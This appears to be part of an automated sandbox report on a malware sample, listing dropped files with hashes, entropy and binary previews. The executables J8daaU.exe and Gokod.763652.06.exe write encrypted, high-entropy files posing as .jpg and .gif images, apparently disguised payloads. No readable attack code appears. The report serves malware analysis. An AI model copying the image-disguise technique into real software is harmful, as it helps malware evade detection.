.T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE0F.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6784
Entropy (8bit):	3.7352677845755733
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbPZtt4iuxYC3K2JrL85aMQUwx89bIhubDlv7fPM6Ym:R6l7wVeJPZtWVYCDmpDy89bIqJ7fP3Ym
MD5:	4C3611CC42265433CBA2F22A9604D272
SHA1:	917E5C3D349EE5DE5A343AB5D38167CA03949C77
SHA-256:	3CCB7AF10A7BADB25CA791D5BAB838306E747DDCBAB6A2AFA675A981F6EDCB90
SHA-512:	CD8A8653D891220A4BB0C09E13E83A9141748C6D5345FD20A77164D374F4D47E6645CA56D49ADFC03C9D81B97C3EE4A06EE0EC9FA6058604CD4C9E6C340FF37A
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.9.9.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE3F.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4741
Entropy (8bit):	4.49270667683529
Encrypted:	false
SSDEEP:	48:cvIwWl8zseNJg771I9TwWpW8VYzYm8M4JRXVvOKFsyq85EXECO/VaTJd:uIjfenI7QJ7VfJFBw/jEVaTJd
MD5:	B0431556EC7568778BECA34941CBECE2
SHA1:	94C7A6103A4ADCA8D6A36DD83FA22AE670A10025
SHA-256:	49B618E69414C374845BDB919DD2C235D6473120170486745C916FC56E8F6E74
SHA-512:	08433330CAAB4B9108CFD1E2D674EBE67366606A2E13EB077FD3F5D230869FC06DEAB2798347A2B59B7A8F2944FDA9F3508F851901CFC5C9B53295DCCD968A2D
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="762924" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE5C.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	77814
Entropy (8bit):	3.056199347215454
Encrypted:	false
SSDEEP:	1536:7BYnYGJ4A67t7qPRqZK8uQ/6W7TyVoYZES32:7BYnYGJ4A67t7qPRqZK8uQ/6W7+VoYZ0
MD5:	D6489BAB25F361E05261564BAAD1BC95
SHA1:	EF99894ECFD30E66CB4E67C4B38A4BF319FD6390
SHA-256:	CFB389D05A80E61B0DE429746F76F41E73AD250655953EBD142A29E692475DFB
SHA-512:	FB77946A9AFDD506C57EA5273444F6EEFD9C56D668DA676320FB85A538A94870C76BC422125B37D411F9994DFAF2127123598F65ACAC3D0827878BC6D2014D0D
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE9B.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.685368221870173
Encrypted:	false
SSDEEP:	96:TiZYWFQ3or69Y0MY/WBH2YEZX4tk0iaVDRZzwd9kEasi/m+MsaWIfZ3:2ZDjeKoeEVasie+MsaRfZ3
MD5:	2F7F9CAB24ABC985AFD0BAB8065FAA0B
SHA1:	0A865785E6A9372FC445C9F1FF2651E5BC5929D8
SHA-256:	94D00D345DDDD5B0114A583C3061731898A452CD2B38E368187FDB416AEC0201
SHA-512:	AE09F14D8981C464FF07A9CFC14E0804E1CB53DA91BC6447BD23EA68497DE0F12B9FAFB9EBA3BC1DC800F2B64A35AA80DE59ACAB5E90311A70919146E9733A17
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\Users\Public\Music\destopbak.ini

Download File

Process:	C:\Users\user\Documents\J8daaU.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:n:n
MD5:	9E688C58A5487B8EAF69C9E1005AD0BF
SHA1:	C4EA21BB365BBEEAF5F2C654883E56D11E43C44E
SHA-256:	DBC1B4C900FFE48D575B5DA5C638040125F65DB0FE3E24494B76EA986457D986
SHA-512:	FAB848C9B657A853EE37C09CBFDD149D0B3807B191DDE9B623CCD95281DD18705B48C89B1503903845BBA5753945351FE6B454852760F73529CF01CA8F69DCCA
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\FOM-51[1].jpg

Download File

Process:	C:\Users\user\Documents\J8daaU.exe
File Type:	PC bitmap, Windows 3.x format, 33 x 21 x 24, image size 2100, cbSize 2154, bits offset 54
Category:	dropped
Size (bytes):	4799965
Entropy (8bit):	7.999939467238583
Encrypted:	true
SSDEEP:	98304:rOYM9cYUR5XCvgGTIGi3gPQrr0UNQ/uLFOxqU5G0t7mr:rOEDR4TIiPYVp/+qr
MD5:	780F7E533FBA4E98715FEC76E9BA5382
SHA1:	6E7D32DA508D42053EAD852B3A8061C157F70305
SHA-256:	5482623356916214C0168725944A0CD0FF07796FAC00E4D003680E612B879D5C
SHA-512:	E03E0F830E329ABEB1B2734516952E5F6918BEFFF522C6F48B5B578C3597CC6B2475FB86C2A5C78CC7B5776B58DE54C98FC2126F980CA3DD7832A03E40FFAE51
Malicious:	false
Preview:	BMj.......6...(...!...............4...................=h..;..;..;..;..;..;..;..:..:..:..:..:..:..:.-:.FQ.......................H..6..6..6..6..6..6..6..6./=./;./;./;./;./;..;..;..;..;..;..;..;..;..;..:..:.9E.........................................../<./<./<./<./<./<./;./<./<..;..;./;..;..;..;..;..;..;./<.mv........................................./<./<./<./<./<./<./<./<./<./<...................0<.0<..;./<.3@................................................=.0=.0=./<./<.0=./<./<./<./<./<./<./<./<./<./<./<./;./<.0=.OZ.........................0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=./<./<./<.0=./<.0=./<./<./<./<./<./<./<./<./<./;./<..;..;..;./;..;..1>.0>.0>.0=.0=.0=.0=.0=.1>.0=.0=.0=.0=.0=.0=.0=.0=.0=./<.0=./<./<./<./<./<./<./<./<./<./<./<./<./;..1>.1>.1>.1>.1>.1>.1>.0>.0>.0=.0=.0=.0>.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=./<./=.0=./<./<./<./<./<./<..QP.1>.1>.1>.1>.1>.1>.2?.1>.1>.1>.1>.1>.1>.0>.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=...*;C.2?.1?.1?.1?.1>.1>.1>.1>.1>.1>.1>.1>.1>.1

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\b[1].gif

Download File

Process:	C:\Users\user\Desktop\Gokod.763652.06.exe
File Type:	PC bitmap, Windows 3.x format, 33 x 21 x 24, image size 2100, cbSize 2154, bits offset 54
Category:	dropped
Size (bytes):	3679381
Entropy (8bit):	7.999920715139405
Encrypted:	true
SSDEEP:	98304:GZEx+gamAtC3BbCzY01owoUHdGk1LYLROXENnn0b7Ke:/ahwCX1omdw8UNn0XKe
MD5:	13E05500C7D6372C50091A56CB1EB698
SHA1:	6A666C3E374F40CEFF6D18D3B798B4E44116E5FB
SHA-256:	3C6D987704BE11CE13F2EA7D56F9C3A6247C4F2718FD6DCD3389803A4B175845
SHA-512:	4F91ED5CAA1E52105CFC60DC3BA017591A63EAA90AEA3E353404FF9A59A553DD5362F81EF90F81274602F030C0201118C8C13DB685AC91C0AF9EE1397BC95AF1
Malicious:	false
Preview:	BMj.......6...(...!...............4...................=h..;..;..;..;..;..;..;..:..:..:..:..:..:..:.-:.FQ.......................H..6..6..6..6..6..6..6..6./=./;./;./;./;./;..;..;..;..;..;..;..;..;..;..:..:.9E.........................................../<./<./<./<./<./<./;./<./<..;..;./;..;..;..;..;..;..;./<.mv........................................./<./<./<./<./<./<./<./<./<./<...................0<.0<..;./<.3@................................................=.0=.0=./<./<.0=./<./<./<./<./<./<./<./<./<./<./<./;./<.0=.OZ.........................0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=./<./<./<.0=./<.0=./<./<./<./<./<./<./<./<./<./;./<..;..;..;./;..;..1>.0>.0>.0=.0=.0=.0=.0=.1>.0=.0=.0=.0=.0=.0=.0=.0=.0=./<.0=./<./<./<./<./<./<./<./<./<./<./<./<./;..1>.1>.1>.1>.1>.1>.1>.0>.0>.0=.0=.0=.0>.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=./<./=.0=./<./<./<./<./<./<..QP.1>.1>.1>.1>.1>.1>.2?.1>.1>.1>.1>.1>.1>.0>.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=...*;C.2?.1?.1?.1?.1>.1>.1>.1>.1>.1>.1>.1>.1>.1

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\s[1].jpg

Download File

Process:	C:\Users\user\Desktop\Gokod.763652.06.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	102636
Entropy (8bit):	7.997951293018451
Encrypted:	true
SSDEEP:	3072:jTDFMOAPqf3lWtmoyUM4J7ruwxW9/o1w5TWdFJUO/Uai:fDC5AVWMo24dT09/O2uCObi
MD5:	CEE07CC9376774EB4A5F09A96A71AD17
SHA1:	881FD345F334BC2E62DF3BDFF647696A55DECEA8
SHA-256:	33C0E19B8FB335397D618A0372CCA727FC8A1FFCD9B2327510C92CCBD5A1C698
SHA-512:	FE03779374AE0C3A4D32B101184B864F1AF68E0ED0523E8B5DA2D3AAC52737BF9F6E0A40BAE36AA8F7423F651CB3297ABA744D3C912641070B315E971DDDB44F
Malicious:	false
Preview:	.PNG........IHDR.............\r.f....pHYs............... .IDATx..}.UU..... ...."..!.......!YFD.HHhD.F.DD&"......".....0...>..0.0..s...~g..;..s....0...;.....#.rg..Zg.....O...\|B..=.. ...... .. ...... .. ...... .. ...... .. ...... .. ...... .. ...... .. ...... .. .........w....WA..5.G.>+0...._;]9....TN...j.;.5.m)..x....Qw.:..."....@j.....s..Y1ujZ..v.n..H.uKv..1...e.x,..FoK...-wl.....3!.h....3..T.....".....`s...k...T..'...\|bnL.Y.V9x{..{f.......e.m...>..%.....@LQ. <e.._..X_Z......7.....s..=R....#..(....n...+\|U....mv...3[..7...Tj...y...1......p...Fl..$....cg..am....+{)...'{...t..d...I.h..w.c:..1._?P.R^..n....M>\<....T......e.......n.S..i.<.t........x..-.......9..n..$.....V<.9y.8W$a\|6>g...x....A7..6...~x_.Z..\.L...]......9...n..."...o...'.0...`5...+X...;.....&A.....^d.`.t..`tR.j..D9..9..:.\|..X........C(. ..sA...V.._3....q>[.~~p.{.........\..:b....n...i..g....'....A7.JP.#y...v..../..n...=U1.........../..n..@....:..3I.F&t...t.......AG.... ..^..y.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\FOM-50[1].jpg

Download File

Process:	C:\Users\user\Documents\J8daaU.exe
File Type:	PC bitmap, Windows 3.x format, 33 x 21 x 24, image size 2100, cbSize 2154, bits offset 54
Category:	dropped
Size (bytes):	151485
Entropy (8bit):	7.993623090708041
Encrypted:	true
SSDEEP:	3072:AeomT3HgigpWkXL1vWq2p5eMjnun5ebTv0uxgOn2nJCPuWcA3/OhJR:b3X2W81vWBeMjnunIVxgOn2nJ2yr
MD5:	0601876CCE2C3A9A699C096A1B9799E1
SHA1:	C39CD27311668872BC45AA121856F7F373833933
SHA-256:	AE189BAF29687F87ED89507D3901D15020B688683ADABA04625D459363DABC19
SHA-512:	97E803D6CC8E62353B81CDDFC1948246BEE7577169421BBF598B8DC49B538F1341F80A797270A943E7E36C79CED77769688A752E5C9F2195D744509E04BA5874
Malicious:	false
Preview:	BMj.......6...(...!...............4...................=h..;..;..;..;..;..;..;..:..:..:..:..:..:..:.-:.FQ.......................H..6..6..6..6..6..6..6..6./=./;./;./;./;./;..;..;..;..;..;..;..;..;..;..:..:.9E.........................................../<./<./<./<./<./<./;./<./<..;..;./;..;..;..;..;..;..;./<.mv........................................./<./<./<./<./<./<./<./<./<./<...................0<.0<..;./<.3@................................................=.0=.0=./<./<.0=./<./<./<./<./<./<./<./<./<./<./<./;./<.0=.OZ.........................0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=./<./<./<.0=./<.0=./<./<./<./<./<./<./<./<./<./;./<..;..;..;./;..;..1>.0>.0>.0=.0=.0=.0=.0=.1>.0=.0=.0=.0=.0=.0=.0=.0=.0=./<.0=./<./<./<./<./<./<./<./<./<./<./<./<./;..1>.1>.1>.1>.1>.1>.1>.0>.0>.0=.0=.0=.0>.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=./<./=.0=./<./<./<./<./<./<..QP.1>.1>.1>.1>.1>.1>.2?.1>.1>.1>.1>.1>.1>.0>.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=...*;C.2?.1?.1?.1?.1>.1>.1>.1>.1>.1>.1>.1>.1>.1

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\d[1].gif

Download File

Process:	C:\Users\user\Desktop\Gokod.763652.06.exe
File Type:	PC bitmap, Windows 3.x format, 33 x 21 x 24, image size 2100, cbSize 2154, bits offset 54
Category:	dropped
Size (bytes):	3963834
Entropy (8bit):	7.997064399987509
Encrypted:	true
SSDEEP:	49152:POhPyT3tBYfE8C38C4Re7eYDY0vM6so8JSGWOXu/0F5g2ON95swP8gbOOLlBxaH9:FBYbh1odYyws0F5g2308ulXiQKAKPz
MD5:	7389347D4BB06F8A6AC6918F164D86B3
SHA1:	B694D497022098133BCEAD9FB54329570322AD44
SHA-256:	2DD36E91F59CD3335C07DC8380BF70817E6A2C04C1B2ACC32726A74ED92530E0
SHA-512:	3AD8DB1A8F0D62BE0D393F68150C1A8EBFDEA14F0E81FEF6E195669D7B1D6D4AB95403CD9827CA14550235FD8BB2EBA87945BFC7874014FDE220D50D0289EBFB
Malicious:	false
Preview:	BMj.......6...(...!...............4...................=h..;..;..;..;..;..;..;..:..:..:..:..:..:..:.-:.FQ.......................H..6..6..6..6..6..6..6..6./=./;./;./;./;./;..;..;..;..;..;..;..;..;..;..:..:.9E.........................................../<./<./<./<./<./<./;./<./<..;..;./;..;..;..;..;..;..;./<.mv........................................./<./<./<./<./<./<./<./<./<./<...................0<.0<..;./<.3@................................................=.0=.0=./<./<.0=./<./<./<./<./<./<./<./<./<./<./<./;./<.0=.OZ.........................0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=./<./<./<.0=./<.0=./<./<./<./<./<./<./<./<./<./;./<..;..;..;./;..;..1>.0>.0>.0=.0=.0=.0=.0=.1>.0=.0=.0=.0=.0=.0=.0=.0=.0=./<.0=./<./<./<./<./<./<./<./<./<./<./<./<./;..1>.1>.1>.1>.1>.1>.1>.0>.0>.0=.0=.0=.0>.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=./<./=.0=./<./<./<./<./<./<..QP.1>.1>.1>.1>.1>.1>.2?.1>.1>.1>.1>.1>.1>.0>.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=...*;C.2?.1?.1?.1?.1>.1>.1>.1>.1>.1>.1>.1>.1>.1

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\f[1].dat

Download File

Process:	C:\Users\user\Documents\J8daaU.exe
File Type:	data
Category:	dropped
Size (bytes):	879
Entropy (8bit):	4.688974052882154
Encrypted:	false
SSDEEP:	6:JRSJwHmHIJRIK4EgY+ZcRC62fmL874S9a6QT7LoV5yEha:fSJGmKIigY+ZcRufmA7VEVEI
MD5:	C345BADB7A3E3F956477B7945E4BE434
SHA1:	CE2EECFF4EAC735F38F82C6FB72A43D1B482839F
SHA-256:	B3CB5CF15F06434BB8F2C2FBDC1B86C8C057721198949928030E380AC6ED75BF
SHA-512:	5729CA585AE10421852D5C91095AA5528AD6DBB2598DAEC7972B86D557DC78D753DC103FB2C3613B9F29DDCED938B9A157CBCD101E0DA63A420B9C63285975CD
Malicious:	false
Preview:	.V.Wf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW11111111111111111111....1 zv.vvvvvvvYIIIvg%&A&&&&&&&NRRV%lyy..KLb#??.\Q.zs\|u.....ali....y$ie.J#g...4pj}}}}}}}}}}}}}}}}}}}}}}}}}}}}}....~7""LO..9xddI..I!('.TFA[u:72KG\Q".2>S.xq<\D@n0'''''''''''''''''''''''''''''OSSW$mxx..JMc">>.]P.{r}t..../`mh....x%hd.K"+f...7si~~~~~~~~~~~~~~~~~~~~~~~~~~~~~....}4!!OL..:{ggJ..J"+$-WEBXv941HD_R!\|1=P.{r?_GAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&GGGG&&&&GGGG&&&&GGGG&&&i...iiiiiiiiiiiiiiiiiiiii19:9uv~.s{{.....................................~zvp.^..y.......................................jvks..].u......................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\FOM-50[1].jpg

Download File

Process:	C:\Users\user\Documents\J8daaU.exe
File Type:	PC bitmap, Windows 3.x format, 33 x 21 x 24, image size 2100, cbSize 2154, bits offset 54
Category:	dropped
Size (bytes):	151485
Entropy (8bit):	7.993623090708041
Encrypted:	true
SSDEEP:	3072:AeomT3HgigpWkXL1vWq2p5eMjnun5ebTv0uxgOn2nJCPuWcA3/OhJR:b3X2W81vWBeMjnunIVxgOn2nJ2yr
MD5:	0601876CCE2C3A9A699C096A1B9799E1
SHA1:	C39CD27311668872BC45AA121856F7F373833933
SHA-256:	AE189BAF29687F87ED89507D3901D15020B688683ADABA04625D459363DABC19
SHA-512:	97E803D6CC8E62353B81CDDFC1948246BEE7577169421BBF598B8DC49B538F1341F80A797270A943E7E36C79CED77769688A752E5C9F2195D744509E04BA5874
Malicious:	false
Preview:	BMj.......6...(...!...............4...................=h..;..;..;..;..;..;..;..:..:..:..:..:..:..:.-:.FQ.......................H..6..6..6..6..6..6..6..6./=./;./;./;./;./;..;..;..;..;..;..;..;..;..;..:..:.9E.........................................../<./<./<./<./<./<./;./<./<..;..;./;..;..;..;..;..;..;./<.mv........................................./<./<./<./<./<./<./<./<./<./<...................0<.0<..;./<.3@................................................=.0=.0=./<./<.0=./<./<./<./<./<./<./<./<./<./<./<./;./<.0=.OZ.........................0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=./<./<./<.0=./<.0=./<./<./<./<./<./<./<./<./<./;./<..;..;..;./;..;..1>.0>.0>.0=.0=.0=.0=.0=.1>.0=.0=.0=.0=.0=.0=.0=.0=.0=./<.0=./<./<./<./<./<./<./<./<./<./<./<./<./;..1>.1>.1>.1>.1>.1>.1>.0>.0>.0=.0=.0=.0>.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=./<./=.0=./<./<./<./<./<./<..QP.1>.1>.1>.1>.1>.1>.2?.1>.1>.1>.1>.1>.1>.0>.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=...*;C.2?.1?.1?.1?.1>.1>.1>.1>.1>.1>.1>.1>.1>.1

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\a[1].gif

Download File

Process:	C:\Users\user\Desktop\Gokod.763652.06.exe
File Type:	PC bitmap, Windows 3.x format, 33 x 21 x 24, image size 2100, cbSize 2154, bits offset 54
Category:	dropped
Size (bytes):	140941
Entropy (8bit):	7.995709860892507
Encrypted:	true
SSDEEP:	3072:QdhlD+ea4Anlrl3/af3xh/I7XsYPv0X7ByK4K9TLPMIldjKBDOe:Qdee2lVAFcfPOAzKdPLdIH
MD5:	7AF26B296715B679817DB8F2BC81CF61
SHA1:	4CCD796003847E5D0E08B1467799E65350A5957B
SHA-256:	EC5AAFAE259A514340C65BD581E5C5D14CC7CA56E639223A7FC871AC12257928
SHA-512:	173C60013923CB26A0BE8C2452E2FB9116B11AAAED6B65E1B95ABD4321D86E2B9D67C777FE34B663CDF713D4CA3C235BFF747DBA731A2C58004C469DD5A1DC68
Malicious:	false
Preview:	BMj.......6...(...!...............4...................=h..;..;..;..;..;..;..;..:..:..:..:..:..:..:.-:.FQ.......................H..6..6..6..6..6..6..6..6./=./;./;./;./;./;..;..;..;..;..;..;..;..;..;..:..:.9E.........................................../<./<./<./<./<./<./;./<./<..;..;./;..;..;..;..;..;..;./<.mv........................................./<./<./<./<./<./<./<./<./<./<...................0<.0<..;./<.3@................................................=.0=.0=./<./<.0=./<./<./<./<./<./<./<./<./<./<./<./;./<.0=.OZ.........................0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=./<./<./<.0=./<.0=./<./<./<./<./<./<./<./<./<./;./<..;..;..;./;..;..1>.0>.0>.0=.0=.0=.0=.0=.1>.0=.0=.0=.0=.0=.0=.0=.0=.0=./<.0=./<./<./<./<./<./<./<./<./<./<./<./<./;..1>.1>.1>.1>.1>.1>.1>.0>.0>.0=.0=.0=.0>.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=./<./=.0=./<./<./<./<./<./<..QP.1>.1>.1>.1>.1>.1>.2?.1>.1>.1>.1>.1>.1>.0>.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=.0=...*;C.2?.1?.1?.1?.1>.1>.1>.1>.1>.1>.1>.1>.1>.1

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\s[1].dat

Download File

Process:	C:\Users\user\Desktop\Gokod.763652.06.exe
File Type:	data
Category:	dropped
Size (bytes):	28272
Entropy (8bit):	7.711603797274546
Encrypted:	false
SSDEEP:	384:9kegCRh1vC6FvsdvaUv2rywX0IK+H8Ku7jVolZ7XRJsKYkGDfRRX5qSgUWCHopQU:v5F1FUdy422IK+gAZt2i0YPpQn4GMv
MD5:	74BBE19E57936611711E761AC6CEEF29
SHA1:	1911402D0CC517CF83966C584C90D64CE84A0B7A
SHA-256:	89A04F442959A14B71C4DBC922214D33D57BD37D98F1C97DF4997181EA10379F
SHA-512:	BD512F3E58714FEF5E977214CE8307CD58BB8602DFC2D4EF4C3B7E7BB28EB61B1DCBB276C2DDC684522EA6EDF60CB00D0A06A58540D8F5C885DE8BF6D6B92508
Malicious:	false
Preview:	..(.........GG..............................................P..........{Z.z7..c_6,./]@H]<0}>_PPQ%q34.FAZz34z>5)Z75>?.225.5555555..G\.@f.z\.@f.{\.@f...\.@f...\.@f...\.@f...\.@f...\.@f...\.@f4......4444444444444444444444444dq44P.<4.g.bbbbbbbbb.b@bi`kbbXbbbpbbbbbb..bbbrbbbbcbbbbbbrbbb`bbdbcbdbcbdbcbbbbbb.bbbfbb..bbcbbbbbfbbbbbbrbbbbbbbbrbbbbbbrbbbbbbbbbbrbbbbbbbbbbbr.bbJbbbb.bb.abbb.bb.cbbb2bb.\|bbb.bb&bbb.#bb~bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"bb.cbbbbbbbbbbbbbbbbbbbbbbbbbbL...n....6.......4..................:..r\...gr.......S.......!..............S..[u?:/N////-///.///-///.//////////////o//......"............................................................................?.........................]s/./L///.,///.